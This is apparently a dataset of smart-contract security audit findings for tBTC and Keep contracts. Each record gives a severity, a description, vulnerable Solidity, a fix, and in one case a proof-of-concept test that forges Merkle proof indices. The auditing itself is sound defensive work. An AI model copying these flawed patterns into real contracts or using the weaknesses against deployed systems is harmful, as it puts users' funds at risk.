\\_extraData.toAddress(20);\\n require(operators[operator].owner == address(0), \"Operator address is already in use.\");\\n address authorizer = \\_extraData.toAddress(40);\\n\\n // Transfer tokens to this contract.\\n token.transferFrom(\\_from, address(this), \\_value);\\n\\n operators[operator] = Operator(\\_value, block.number, 0, \\_from, magpie, authorizer);\\n ownerOperators[\\_from].push(operator);\\n\\n emit Staked(operator, \\_value);\\n}\\n```\\nчRequire tokens to be staked and explicitly disallow the zero amount of tokens case. The balance check can be removed.\\nNote: Consider checking the calls return value or calling the contract via `SafeERC20` to support potentially broken tokens that do not revert in error cases (token.transferFrom).чч```\\n/\\*\\*\\n \\* @notice Receives approval of token transfer and stakes the approved amount.\\n \\* @dev Makes sure provided token contract is the same one linked to this contract.\\n \\* @param \\_from The owner of the tokens who approved them to transfer.\\n \\* @param \\_value Approved amount for the transfer and stake.\\n \\* @param \\_token Token contract address.\\n \\* @param \\_extraData Data for stake delegation. This byte array must have the\\n \\* following values concatenated: Magpie address (20 bytes) where the rewards for participation\\n \\* are sent, operator's (20 bytes) address, authorizer (20 bytes) address.\\n \\*/\\nfunction receiveApproval(address \\_from, uint256 \\_value, address \\_token, bytes memory \\_extraData) public {\\n require(ERC20Burnable(\\_token) == token, \"Token contract must be the same one linked to this contract.\");\\n require(\\_value <= token.balanceOf(\\_from), \"Sender must have enough tokens.\");\\n require(\\_extraData.length == 60, \"Stake delegation data must be provided.\");\\n\\n address payable magpie = address(uint160(\\_extraData.toAddress(0)));\\n address operator = \\_extraData.toAddress(20);\\n require(operators[operator].owner == address(0), \"Operator address is already in use.\");\\n address authorizer = \\_extraData.toAddress(40);\\n\\n // Transfer tokens to this contract.\\n token.transferFrom(\\_from, address(this), \\_value);\\n\\n operators[operator] = Operator(\\_value, block.number, 0, \\_from, magpie, authorizer);\\n ownerOperators[\\_from].push(operator);\\n\\n emit Staked(operator, \\_value);\\n}\\n```\\n -tbtc - Inconsistency between increaseRedemptionFee and provideRedemptionProof may create un-provable redemptionsчmediumч`DepositRedemption.increaseRedemptionFee` is used by signers to approve a signable bitcoin transaction with a higher fee, in case the network is congested and miners are not approving the lower-fee transaction.\\nFee increases can be performed every 4 hours:\\n```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), \"Fee increase not yet permitted\");\\n```\\n\\nIn addition, each increase must increment the fee by exactly the initial proposed fee:\\n```\\n// Check that we're incrementing the fee by exactly the redeemer's initial fee\\nuint256 \\_previousOutputValue = DepositUtils.bytes8LEToUint(\\_previousOutputValueBytes);\\n\\_newOutputValue = DepositUtils.bytes8LEToUint(\\_newOutputValueBytes);\\nrequire(\\_previousOutputValue.sub(\\_newOutputValue) == \\_d.initialRedemptionFee, \"Not an allowed fee step\");\\n```\\n\\nOutside of these two restrictions, there is no limit to the number of times `increaseRedemptionFee` can be called. Over a 20-hour period, for example, `increaseRedemptionFee` could be called 5 times, increasing the fee to `initialRedemptionFee * 5`. Over a 24-hour period, `increaseRedemptionFee` could be called 6 times, increasing the fee to `initialRedemptionFee * 6`.\\nEventually, it is expected that a transaction will be submitted and mined. At this point, anyone can call `DepositRedemption.provideRedemptionProof`, finalizing the redemption process and rewarding the signers. However, `provideRedemptionProof` will fail if the transaction fee is too high:\\n```\\nrequire((\\_d.utxoSize().sub(\\_fundingOutputValue)) <= \\_d.initialRedemptionFee \\* 5, \"Fee unexpectedly very high\");\\n```\\n\\nIn the case that `increaseRedemptionFee` is called 6 times and the signers provide a signature for this transaction, the transaction can be submitted and mined but `provideRedemptionProof` for this will always fail. Eventually, a redemption proof timeout will trigger the deposit into liquidation and the signers will be punished.чBecause it is difficult to say with certainty that a 5x fee increase will always ensure a transaction's redeemability, the upper bound on fee bumps should be removed from `provideRedemptionProof`.\\nThis should be implemented in tandem with https://github.com/ConsenSys/thesis-tbtc-audit-2020-01/issues/38, so that signers cannot provide a proof that bypasses `increaseRedemptionFee` flow to spend the highest fee possible.чч```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), \"Fee increase not yet permitted\");\\n```\\n -keep-tecdsa - keep cannot be closed if a members bond was seized or fully reassignedчmediumчA keep cannot be closed if the bonds have been completely reassigned or seized before, leaving at least one member with zero `lockedBonds`. In this case `closeKeep()` will throw in `freeMembersBonds()` because the requirement in `keepBonding.freeBond` is not satisfied anymore (lockedBonds[bondID] > 0). As a result of this, none of the potentially remaining bonds (reassign) are freed, the keep stays active even though it should be closed.\\n```\\n/// @notice Closes keep when owner decides that they no longer need it.\\n/// Releases bonds to the keep members. Keep can be closed only when\\n/// there is no signing in progress or requested signing process has timed out.\\n/// @dev The function can be called by the owner of the keep and only is the\\n/// keep has not been closed already.\\nfunction closeKeep() external onlyOwner onlyWhenActive {\\n require(\\n !isSigningInProgress() || hasSigningTimedOut(),\\n \"Requested signing has not timed out yet\"\\n );\\n\\n isActive = false;\\n\\n freeMembersBonds();\\n\\n emit KeepClosed();\\n}\\n\\n/// @notice Returns bonds to the keep members.\\nfunction freeMembersBonds() internal {\\n for (uint256 i = 0; i < members.length; i++) {\\n keepBonding.freeBond(members[i], uint256(address(this)));\\n }\\n}\\n```\\n\\n```\\n/// @notice Releases the bond and moves the bond value to the operator's\\n/// unbounded value pool.\\n/// @dev Function requires that caller is the holder of the bond which is\\n/// being released.\\n/// @param operator Address of the bonded operator.\\n/// @param referenceID Reference ID of the bond.\\nfunction freeBond(address operator, uint256 referenceID) public {\\n address holder = msg.sender;\\n bytes32 bondID = keccak256(\\n abi.encodePacked(operator, holder, referenceID)\\n );\\n\\n require(lockedBonds[bondID] > 0, \"Bond not found\");\\n\\n uint256 amount = lockedBonds[bondID];\\n lockedBonds[bondID] = 0;\\n unbondedValue[operator] = amount;\\n}\\n```\\nчMake sure the keep can be set to an end-state (closed/inactive) indicating its end-of-life even if the bond has been seized before. Avoid throwing an exception when freeing member bonds to avoid blocking the unlocking of bonds.чч```\\n/// @notice Closes keep when owner decides that they no longer need it.\\n/// Releases bonds to the keep members. Keep can be closed only when\\n/// there is no signing in progress or requested signing process has timed out.\\n/// @dev The function can be called by the owner of the keep and only is the\\n/// keep has not been closed already.\\nfunction closeKeep() external onlyOwner onlyWhenActive {\\n require(\\n !isSigningInProgress() || hasSigningTimedOut(),\\n \"Requested signing has not timed out yet\"\\n );\\n\\n isActive = false;\\n\\n freeMembersBonds();\\n\\n emit KeepClosed();\\n}\\n\\n/// @notice Returns bonds to the keep members.\\nfunction freeMembersBonds() internal {\\n for (uint256 i = 0; i < members.length; i++) {\\n keepBonding.freeBond(members[i], uint256(address(this)));\\n }\\n}\\n```\\n -tbtc - provideFundingECDSAFraudProof attempts to burn non-existent fundsчmediumчThe funding flow was recently changed from requiring the funder to provide a bond that stays in the Deposit contract to forwarding the funds to the keep, paying for the keep setup.\\nSo at a high level, the funding bond was designed to ensure that funders had some minimum skin in the game, so that DoSing signers/the system was expensive. The upside was that we could refund it in happy paths. Now that we've realized that opening the keep itself will cost enough to prevent DoS, the concept of refunding goes away entirely. We definitely missed cleaning up the funder handling in provideFundingECDSAFraudProof though.\\n```\\n// If the funding timeout has elapsed, punish the funder too!\\nif (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n```\\nчRemove the line that attempts to punish the funder by burning the Deposit contract balance which is zero due to recent changes in how the payment provided with createNewDepositis handled.чч```\\n// If the funding timeout has elapsed, punish the funder too!\\nif (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n```\\n -bitcoin-spv - Bitcoin output script length is not checked in wpkhSpendSighash Won't Fixчmediumч`CheckBitcoinSigs.wpkhSpendSighash` calculates the sighash of a Bitcoin transaction. Among its parameters, it accepts `bytes memory _outpoint`, which is a 36-byte UTXO id consisting of a 32-byte transaction hash and a 4-byte output index.\\nThe function in question should not accept an `_outpoint` that is not 36-bytes, but no length check is made:\\n```\\nfunction wpkhSpendSighash(\\n bytes memory \\_outpoint, // 36 byte UTXO id\\n bytes20 \\_inputPKH, // 20 byte hash160\\n bytes8 \\_inputValue, // 8-byte LE\\n bytes8 \\_outputValue, // 8-byte LE\\n bytes memory \\_outputScript // lenght-prefixed output script\\n) internal pure returns (bytes32) {\\n // Fixes elements to easily make a 1-in 1-out sighash digest\\n // Does not support timelocks\\n bytes memory \\_scriptCode = abi.encodePacked(\\n hex\"1976a914\", // length, dup, hash160, pkh\\_length\\n \\_inputPKH,\\n hex\"88ac\"); // equal, checksig\\n bytes32 \\_hashOutputs = abi.encodePacked(\\n \\_outputValue, // 8-byte LE\\n \\_outputScript).hash256();\\n bytes memory \\_sighashPreimage = abi.encodePacked(\\n hex\"01000000\", // version\\n \\_outpoint.hash256(), // hashPrevouts\\n hex\"8cb9012517c817fead650287d61bdd9c68803b6bf9c64133dcab3e65b5a50cb9\", // hashSequence(00000000)\\n \\_outpoint, // outpoint\\n \\_scriptCode, // p2wpkh script code\\n \\_inputValue, // value of the input in 8-byte LE\\n hex\"00000000\", // input nSequence\\n \\_hashOutputs, // hash of the single output\\n hex\"00000000\", // nLockTime\\n hex\"01000000\" // SIGHASH\\_ALL\\n );\\n return \\_sighashPreimage.hash256();\\n}\\n```\\nчCheck that `_outpoint.length` is 36.чч```\\nfunction wpkhSpendSighash(\\n bytes memory \\_outpoint, // 36 byte UTXO id\\n bytes20 \\_inputPKH, // 20 byte hash160\\n bytes8 \\_inputValue, // 8-byte LE\\n bytes8 \\_outputValue, // 8-byte LE\\n bytes memory \\_outputScript // lenght-prefixed output script\\n) internal pure returns (bytes32) {\\n // Fixes elements to easily make a 1-in 1-out sighash digest\\n // Does not support timelocks\\n bytes memory \\_scriptCode = abi.encodePacked(\\n hex\"1976a914\", // length, dup, hash160, pkh\\_length\\n \\_inputPKH,\\n hex\"88ac\"); // equal, checksig\\n bytes32 \\_hashOutputs = abi.encodePacked(\\n \\_outputValue, // 8-byte LE\\n \\_outputScript).hash256();\\n bytes memory \\_sighashPreimage = abi.encodePacked(\\n hex\"01000000\", // version\\n \\_outpoint.hash256(), // hashPrevouts\\n hex\"8cb9012517c817fead650287d61bdd9c68803b6bf9c64133dcab3e65b5a50cb9\", // hashSequence(00000000)\\n \\_outpoint, // outpoint\\n \\_scriptCode, // p2wpkh script code\\n \\_inputValue, // value of the input in 8-byte LE\\n hex\"00000000\", // input nSequence\\n \\_hashOutputs, // hash of the single output\\n hex\"00000000\", // nLockTime\\n hex\"01000000\" // SIGHASH\\_ALL\\n );\\n return \\_sighashPreimage.hash256();\\n}\\n```\\n -tbtc - liquidationInitiator can block purchaseSignerBondsAtAuction indefinitelyчmediumчWhen reporting a fraudulent proof the deposits `liquidationInitiator` is set to the entity reporting and proofing the fraud. The deposit that is in a `*_liquidation_in_progress` state can be bought by anyone at an auction calling `purchaseSignerBondsAtAuction`.\\nInstead of receiving a share of the funds the `liquidationInitiator` can decide to intentionally reject the funds by raising an exception causing `initiator.transfer(contractEthBalance)` to throw, blocking the auction and forcing the liquidation to fail. The deposit will stay in one of the `*_liquidation_in_progress` states.\\n```\\n/// @notice Closes an auction and purchases the signer bonds. Payout to buyer, funder, then signers if not fraud\\n/// @dev For interface, reading auctionValue will give a past value. the current is better\\n/// @param \\_d deposit storage pointer\\nfunction purchaseSignerBondsAtAuction(DepositUtils.Deposit storage \\_d) public {\\n bool \\_wasFraud = \\_d.inFraudLiquidationInProgress();\\n require(\\_d.inSignerLiquidation(), \"No active auction\");\\n\\n \\_d.setLiquidated();\\n \\_d.logLiquidated();\\n\\n // send the TBTC to the TDT holder. If the TDT holder is the Vending Machine, burn it to maintain the peg.\\n address tdtHolder = \\_d.depositOwner();\\n\\n TBTCToken \\_tbtcToken = TBTCToken(\\_d.TBTCToken);\\n\\n uint256 lotSizeTbtc = \\_d.lotSizeTbtc();\\n require(\\_tbtcToken.balanceOf(msg.sender) >= lotSizeTbtc, \"Not enough TBTC to cover outstanding debt\");\\n\\n if(tdtHolder == \\_d.VendingMachine){\\n \\_tbtcToken.burnFrom(msg.sender, lotSizeTbtc); // burn minimal amount to cover size\\n }\\n else{\\n \\_tbtcToken.transferFrom(msg.sender, tdtHolder, lotSizeTbtc);\\n }\\n\\n // Distribute funds to auction buyer\\n uint256 \\_valueToDistribute = \\_d.auctionValue();\\n msg.sender.transfer(\\_valueToDistribute);\\n\\n // Send any TBTC left to the Fee Rebate Token holder\\n \\_d.distributeFeeRebate();\\n\\n // For fraud, pay remainder to the liquidation initiator.\\n // For non-fraud, split 50-50 between initiator and signers. if the transfer amount is 1,\\n // division will yield a 0 value which causes a revert; instead, \\n // we simply ignore such a tiny amount and leave some wei dust in escrow\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\nчUse a pull vs push funds pattern or use `address.send` instead of `address.transfer` which might leave some funds locked in the contract if it fails.чч```\\n/// @notice Closes an auction and purchases the signer bonds. Payout to buyer, funder, then signers if not fraud\\n/// @dev For interface, reading auctionValue will give a past value. the current is better\\n/// @param \\_d deposit storage pointer\\nfunction purchaseSignerBondsAtAuction(DepositUtils.Deposit storage \\_d) public {\\n bool \\_wasFraud = \\_d.inFraudLiquidationInProgress();\\n require(\\_d.inSignerLiquidation(), \"No active auction\");\\n\\n \\_d.setLiquidated();\\n \\_d.logLiquidated();\\n\\n // send the TBTC to the TDT holder. If the TDT holder is the Vending Machine, burn it to maintain the peg.\\n address tdtHolder = \\_d.depositOwner();\\n\\n TBTCToken \\_tbtcToken = TBTCToken(\\_d.TBTCToken);\\n\\n uint256 lotSizeTbtc = \\_d.lotSizeTbtc();\\n require(\\_tbtcToken.balanceOf(msg.sender) >= lotSizeTbtc, \"Not enough TBTC to cover outstanding debt\");\\n\\n if(tdtHolder == \\_d.VendingMachine){\\n \\_tbtcToken.burnFrom(msg.sender, lotSizeTbtc); // burn minimal amount to cover size\\n }\\n else{\\n \\_tbtcToken.transferFrom(msg.sender, tdtHolder, lotSizeTbtc);\\n }\\n\\n // Distribute funds to auction buyer\\n uint256 \\_valueToDistribute = \\_d.auctionValue();\\n msg.sender.transfer(\\_valueToDistribute);\\n\\n // Send any TBTC left to the Fee Rebate Token holder\\n \\_d.distributeFeeRebate();\\n\\n // For fraud, pay remainder to the liquidation initiator.\\n // For non-fraud, split 50-50 between initiator and signers. if the transfer amount is 1,\\n // division will yield a 0 value which causes a revert; instead, \\n // we simply ignore such a tiny amount and leave some wei dust in escrow\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\n -bitcoin-spv - verifyHash256Merkle allows existence proofs for the same leaf in multiple locations in the tree Won't Fixчmediumч`BTCUtils.verifyHash256Merkle` is used by `ValidateSPV.prove` to validate a transaction's existence in a Bitcoin block. The function accepts as input a `_proof` and an `_index`. The `_proof` consists of, in order: the transaction hash, a list of intermediate nodes, and the merkle root.\\nThe proof is performed iteratively, and uses the `_index` to determine whether the next proof element represents a “left branch” or a “right branch:”\\n```\\nuint \\_idx = \\_index;\\nbytes32 \\_root = \\_proof.slice(\\_proof.length - 32, 32).toBytes32();\\nbytes32 \\_current = \\_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\\_proof.length.div(32)) - 1; i++) {\\n if (\\_idx % 2 == 1) {\\n \\_current = \\_hash256MerkleStep(\\_proof.slice(i \\* 32, 32), abi.encodePacked(\\_current));\\n } else {\\n \\_current = \\_hash256MerkleStep(abi.encodePacked(\\_current), \\_proof.slice(i \\* 32, 32));\\n }\\n \\_idx = \\_idx 1;\\n}\\nreturn \\_current == \\_root;\\n```\\n\\nIf `_idx` is even, the computed hash is placed before the next proof element. If `_idx` is odd, the computed hash is placed after the next proof element. After each iteration, `_idx` is decremented by `_idx /= 2`.\\nBecause `verifyHash256Merkle` makes no requirements on the size of `_proof` relative to `_index`, it is possible to pass in invalid values for `_index` that prove a transaction's existence in multiple locations in the tree.\\nBy modifying existing tests, we showed that any transaction can be proven to exist at least one alternate index. This alternate index is calculated as `(2 ** treeHeight) + prevIndex` - though other alternate indices are possible. The modified test is below:\\n```\\nit('verifies a bitcoin merkle root', async () => {\\n for (let i = 0; i < verifyHash256Merkle.length; i += 1) {\\n const res = await instance.verifyHash256Merkle(\\n verifyHash256Merkle[i].input.proof,\\n verifyHash256Merkle[i].input.index\\n ); // 0-indexed\\n assert.strictEqual(res, verifyHash256Merkle[i].output);\\n\\n // Now, attempt to use the same proof to verify the same leaf at\\n // a different index in the tree:\\n let pLen = verifyHash256Merkle[i].input.proof.length;\\n let height = ((pLen - 2) / 64) - 2;\\n\\n // Only attempt to verify roots that are meant to be verified\\n if (verifyHash256Merkle[i].output && height >= 1) {\\n let altIdx = (2 ** height) + verifyHash256Merkle[i].input.index;\\n\\n const resNext = await instance.verifyHash256Merkle(\\n verifyHash256Merkle[i].input.proof,\\n altIdx\\n );\\n\\n assert.strictEqual(resNext, verifyHash256Merkle[i].output);\\n\\n console.log('Verified transaction twice!');\\n }\\n }\\n});\\n```\\nчUse the length of `_proof` to determine the maximum allowed `_index`. `_index` should satisfy the following criterion: `_index` < 2 ** (_proof.length.div(32) - 2).\\nNote that subtraction by 2 accounts for the transaction hash and merkle root, which are assumed to be encoded in the proof along with the intermediate nodes.чч```\\nuint \\_idx = \\_index;\\nbytes32 \\_root = \\_proof.slice(\\_proof.length - 32, 32).toBytes32();\\nbytes32 \\_current = \\_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\\_proof.length.div(32)) - 1; i++) {\\n if (\\_idx % 2 == 1) {\\n \\_current = \\_hash256MerkleStep(\\_proof.slice(i \\* 32, 32), abi.encodePacked(\\_current));\\n } else {\\n \\_current = \\_hash256MerkleStep(abi.encodePacked(\\_current), \\_proof.slice(i \\* 32, 32));\\n }\\n \\_idx = \\_idx 1;\\n}\\nreturn \\_current == \\_root;\\n```\\n -keep-core - stake operator should not be eligible if undelegatedAt is setчlowчAn operator's stake should not be eligible if they stake an amount and immediately call `undelegate` in an attempt to indicate that they are going to recover their stake soon.\\n```\\nbool notUndelegated = block.number <= operator.undelegatedAt || operator.undelegatedAt == 0;\\n\\nif (isAuthorized && isActive && notUndelegated) {\\n balance = operator.amount;\\n}\\n```\\nчA stake that is entering undelegation is indicated by `operator.undelegatedAt` being non-zero. Change the `notUndelegated` check block.number <= `operator.undelegatedAt` || `operator.undelegatedAt` == 0 to `operator.undelegatedAT == 0` as any value being set indicates that undelegation is in progress.\\nEnforce that within the initialization period stake is canceled instead of being undelegated.чч```\\nbool notUndelegated = block.number <= operator.undelegatedAt || operator.undelegatedAt == 0;\\n\\nif (isAuthorized && isActive && notUndelegated) {\\n balance = operator.amount;\\n}\\n```\\n -keep-core - Specification inconsistency: TokenStaking amount to be slashed/seizedчlowчThe keep specification states that `slash` and `seize` affect at least the amount specified or the remaining stake of a member.\\nSlash each operator in the list misbehavers by the specified amount (or their remaining stake, whichever is lower).\\nPunish each operator in the list misbehavers by the specified amount or their remaining stake.\\nThe implementation, however, bails if one of the accounts does not have enough stake to be slashed or seized because of the use of `SafeMath.sub()`. This behavior is inconsistent with the specification which states that `min(amount, misbehaver.stake)` stake should be affected. The call to slash/seize will revert and no stakes are affected. At max, the staked amount of the lowest staker can be slashed/seized from every staker.\\nImplementing this method as stated in the specification using `min(amount, misbehaver.stake)` will cover the fact that slashing/seizing was only partially successful. If `misbehaver.stake` is zero no error might be emitted even though no stake was slashed/seized.\\n```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n\\n/\\*\\*\\n \\* @dev Seize provided token amount from every member in the misbehaved\\n \\* operators array. The tattletale is rewarded with 5% of the total seized\\n \\* amount scaled by the reward adjustment parameter and the rest 95% is burned.\\n \\* @param amount Token amount to seize from every misbehaved operator.\\n \\* @param rewardMultiplier Reward adjustment in percentage. Min 1% and 100% max.\\n \\* @param tattletale Address to receive the 5% reward.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction seize(\\n uint256 amount,\\n uint256 rewardMultiplier,\\n address tattletale,\\n address[] memory misbehavedOperators\\n) public onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n uint256 total = misbehavedOperators.length.mul(amount);\\n uint256 tattletaleReward = (total.mul(5).div(100)).mul(rewardMultiplier).div(100);\\n\\n token.transfer(tattletale, tattletaleReward);\\n token.burn(total.sub(tattletaleReward));\\n}\\n```\\nчRequire that `minimumStake` has been provided and can be seized/slashed. Update the documentation to reflect the fact that the solution always seizes/slashes `minimumStake`. Ensure that stakers cannot cancel their stake while they are actively participating in the network.чч```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n\\n/\\*\\*\\n \\* @dev Seize provided token amount from every member in the misbehaved\\n \\* operators array. The tattletale is rewarded with 5% of the total seized\\n \\* amount scaled by the reward adjustment parameter and the rest 95% is burned.\\n \\* @param amount Token amount to seize from every misbehaved operator.\\n \\* @param rewardMultiplier Reward adjustment in percentage. Min 1% and 100% max.\\n \\* @param tattletale Address to receive the 5% reward.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction seize(\\n uint256 amount,\\n uint256 rewardMultiplier,\\n address tattletale,\\n address[] memory misbehavedOperators\\n) public onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n uint256 total = misbehavedOperators.length.mul(amount);\\n uint256 tattletaleReward = (total.mul(5).div(100)).mul(rewardMultiplier).div(100);\\n\\n token.transfer(tattletale, tattletaleReward);\\n token.burn(total.sub(tattletaleReward));\\n}\\n```\\n -keep-tecdsa - Change state-mutability of checkSignatureFraud to viewчlowч```\\nfunction submitSignatureFraud(\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes calldata \\_preimage\\n) external returns (bool \\_isFraud) {\\n require(publicKey.length != 0, \"Public key was not set yet\");\\n\\n bytes32 calculatedDigest = sha256(\\_preimage);\\n require(\\n \\_signedDigest == calculatedDigest,\\n \"Signed digest does not match double sha256 hash of the preimage\"\\n );\\n\\n bool isSignatureValid = publicKeyToAddress(publicKey) ==\\n ecrecover(\\_signedDigest, \\_v, \\_r, \\_s);\\n\\n // Check if the signature is valid but was not requested.\\n require(\\n isSignatureValid && !digests[\\_signedDigest],\\n \"Signature is not fraudulent\"\\n );\\n\\n return true;\\n}\\n```\\nчDeclare method as `view`. Consider renaming `submitSignatureFraud` to e.g. `checkSignatureFraud` to emphasize that it is only checking the signature and not actually changing state.чч```\\nfunction submitSignatureFraud(\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes calldata \\_preimage\\n) external returns (bool \\_isFraud) {\\n require(publicKey.length != 0, \"Public key was not set yet\");\\n\\n bytes32 calculatedDigest = sha256(\\_preimage);\\n require(\\n \\_signedDigest == calculatedDigest,\\n \"Signed digest does not match double sha256 hash of the preimage\"\\n );\\n\\n bool isSignatureValid = publicKeyToAddress(publicKey) ==\\n ecrecover(\\_signedDigest, \\_v, \\_r, \\_s);\\n\\n // Check if the signature is valid but was not requested.\\n require(\\n isSignatureValid && !digests[\\_signedDigest],\\n \"Signature is not fraudulent\"\\n );\\n\\n return true;\\n}\\n```\\n -keep-core - Specification inconsistency: TokenStaking.slash() is never calledчlowчAccording to the keep specification stake should be slashed if a staker violates the protocol:\\nSlashing If a staker violates the protocol of an operation in a way which can be proven on-chain, they will be penalized by having their stakes slashed.\\nWhile this functionality can only be called by the approved operator contract, it is not being used throughout the system. In contrast `seize()` is being called when reporting unauthorized signing or relay entry timeout.\\n```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n```\\nчImplement slashing according to the specification.чч```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n```\\n -tbtc - Remove notifyDepositExpiryCourtesyCall and allow exitCourtesyCall exiting the courtesy call at termчlowчFollowing a deep dive into state transitions with the client it was agreed that `notifyDepositExpiryCourtesyCall` should be removed from the system as it is a left-over of a previous version of the deposit contract.\\nAdditionally, `exitCourtesyCall` should be callable at any time.\\n```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), \"Not currently in courtesy call\");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), \"Deposit is expiring\");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, \"Deposit is still undercollateralized\");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\nчRemove the `notifyDepositExpiryCourtesyCall` state transition and remove the requirement on `exitCourtesyCall` being callable only before the deposit expires.чч```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), \"Not currently in courtesy call\");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), \"Deposit is expiring\");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, \"Deposit is still undercollateralized\");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\n -keep-tecdsa - withdraw should check for zero value transferчlowчRequesting the withdrawal of zero `ETH` in `KeepBonding.withdraw` should fail as this would allow the method to succeed, calling the user-provided destination even though the sender has no unbonded value.\\n```\\nfunction withdraw(uint256 amount, address payable destination) public {\\n require(\\n unbondedValue[msg.sender] >= amount,\\n \"Insufficient unbonded value\"\\n );\\n\\n unbondedValue[msg.sender] -= amount;\\n\\n (bool success, ) = destination.call.value(amount)(\"\");\\n require(success, \"Transfer failed\");\\n}\\n```\\n\\nAnd a similar instance in BondedECDSAKeep:\\n```\\n/// @notice Withdraws amount of ether hold in the keep for the member.\\n/// The value is sent to the beneficiary of the specific member.\\n/// @param \\_member Keep member address.\\nfunction withdraw(address \\_member) external {\\n uint256 value = 